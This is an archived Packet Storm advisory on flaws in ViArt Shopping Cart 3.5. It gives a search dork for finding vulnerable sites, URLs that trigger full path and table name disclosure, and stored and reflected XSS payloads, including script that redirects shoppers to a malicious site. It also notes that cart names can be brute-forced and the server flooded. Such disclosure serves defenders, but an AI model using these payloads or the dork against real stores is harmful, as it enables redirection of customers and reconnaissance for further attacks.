ViArt Shopping Cart 3.5 XSS / Path Disclosure

2008-12-31T00:00:00
ID PACKETSTORM:73453
Type packetstorm
Reporter Xia Shing Zee
Modified 2008-12-31T00:00:00

Description

                                        
                                            `===============================================================  
!vuln  
ViArt Shopping Cart v3.5 is prone to multiple remote   
vulnerabilities. Earlier versions may also be affected.  
===============================================================  
  
===============================================================  
!dork  
Dork: intext:"Free Ecommerce Shopping Cart Software by ViArt" +"Your shopping cart is empty!" + "Products Search" +"Advanced Search" + "All Categories"  
===============================================================  
  
===============================================================  
!risk 1 - Full Path Disclosure  
Low  
Attackers can use this vulnerability to leverage another attack  
after the full path has been disclosed.  
===============================================================  
  
===============================================================  
!discussion 1 - Full Path Disclosure  
The server will give an error when any URL real/imaginary is   
passed to the POST_DATA parameter:  
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com  
  
A remote user is able to identify the full path of the document  
root folder.  
===============================================================  
  
===============================================================  
!risk 2 - Information Disclosure  
Medium  
The table names can be further leveraged for a SQL injection if  
one exists.  
===============================================================  
  
===============================================================  
!discussion 2 - Information Disclosure  
When a user is not signed in, the tables are shown to the   
attacker via an error, because the PHP form fails to properly  
sanitize user_id since the user is not logged in.  
  
The attacker must first try to add a product to the cart and   
then save the shopping cart for the tables to be revealed by   
browsing to: http://www.victim.com/cart_save.php  
===============================================================  
  
===============================================================  
!risk 3 - Arbitrary Code Injection  
High  
Attackers can use this vulnerability to execute arbitrary code  
on a legitimate user.  
===============================================================  
  
===============================================================  
!discussion 3 - Arbitrary Code Injection  
The attacker is able to create shopping carts with   
HTML/Javascript injected code such as:  
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><a href="http://www.google.com">Google</a></html>  
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>  
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>  
  
Then when the user visits "My Saved Carts" at   
http://victim.com/user_carts.php the code is executed:  
Example 1 would give a link to the Google search engine.  
Example 2 would give a javascript alert popup displaying "VULN".  
Example 3 would send the user to a malicious site.  
  
Note: manuals_search.php is also vulnerable to the same   
HTML/Javascript vulnerability that allows for arbitrary code to  
be executed:  
http://www.victim.com/manuals_search.php?manuals_search=<html><script>window.location="http://malicious-site.com";</script></html>  
  
A remote user is able to identify the full path of the document  
root folder.  
===============================================================  
  
===============================================================  
!extras  
The Cart name is all that needs to be guessed/brute-forced for   
an attacker to gain entry to the shopping cart. As the cart-id   
increments from 1 upwards. This does not require any user-login  
from the attacker.  
  
An attacker could also overload the server with a ton of   
shopping carts by constantly refreshing cart_save.php to create  
multiple shopping cart ID's.  
===============================================================  
  
===============================================================  
!solution  
ViArt Shopping Cart can still be used, but be wary of the full   
path disclosure and make sure no SQL injections can take place  
once an attacker knows the table names. Alert users that they   
should be wary of which links they click on as an attacker   
could redirect them to a malicious site. The overloading of   
cart_save.php can be solved by placing IP-bans on attackers.  
There is no solution to the brute-force guessing of cart names.  
The vendor has not yet been notified.  
===============================================================  
  
===============================================================  
!greetz  
Greetz go out to the people who know me.  
===============================================================  
  
===============================================================  
!author  
Xia Shing Zee  
===============================================================  
`